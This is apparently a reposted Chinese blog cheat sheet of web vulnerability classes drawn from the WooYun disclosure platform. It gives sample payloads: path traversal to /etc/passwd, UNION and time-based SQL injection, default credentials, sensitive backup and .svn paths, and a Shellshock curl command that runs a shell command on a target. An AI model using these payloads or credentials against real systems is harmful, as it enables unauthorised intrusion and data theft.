那些年 WooYun 的漏洞

其他 2019-06-07 02:22:18 阅读次数: 0

Type:

  • 任意文件读取

    ../../../../../../../../../../etc/passwd%00
    /etc/sysconfig/network
    ../../../foo/../../../../etc/passwd   //nodejs

  • SQL注入

    and 1=2 union select 1,2,version(),3%23
    框架注入(ThinkPHP)
    GET POST 参数
    伪静态  *
    Referer
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'

  • 弱口令

    Username:中国姓名排行TOP500
Password:admin  admin123 qyer           //字典的重要性!!!
    /manager/html  tomcat:tomcat
    ftp 弱口令  phpmyadmin 弱口令

  • 敏感信息泄露

    .bak  /.svn/entries  wwwroot.tar.gz .swp  web.rar
    openssl
    目录遍历
    shodan
    github 敏感信息

  • 未授权访问

    RSYNC 匿名访问
    JBoss:/jmx-console/  /admin-console/

  • 命令执行

    CMS(discuz、)命令执行
    curl http://1XX.XX.XX.XX:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
    http://test.xxx.com:8082/struts_spy/example/HelloWorld.action //struts2

  • 任意文件上传

    cer、

  • SSRF

    url=           //ip服务

  • 设计缺陷

    验证码可识别

猜你喜欢

转载自www.cnblogs.com/skrr/p/10987425.html
今日推荐
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
最强开源大模型 Llama 3 上架 Gitee AI
虽然老乡鸡开源的不是代码,但背后的原因却让人很暖心
富文本编辑器 Quill 2.0 重磅发布,特性、可靠性与开发者体验大幅提升
周排行
使用Redis中间件解决商品秒杀活动中出现的超卖问题(使用Java多线程模拟高并发环境)
野指针及c++指针使用注意点
redis 3.0 新特性
(翻译)火狐操作系统javascript API
微信小程序开发入门
mysql数据查询之五子句(where、group by、having、order by和limit)
Codeforces Round #517 Div. 1翻车记
在caffe 中实现Generative Adversarial Nets(二)
企业级漏洞扫描工具
java byte数组与String互转
每日归档
更多
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)
2024-04-16(70)
2024-04-15(42)
2024-04-14(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022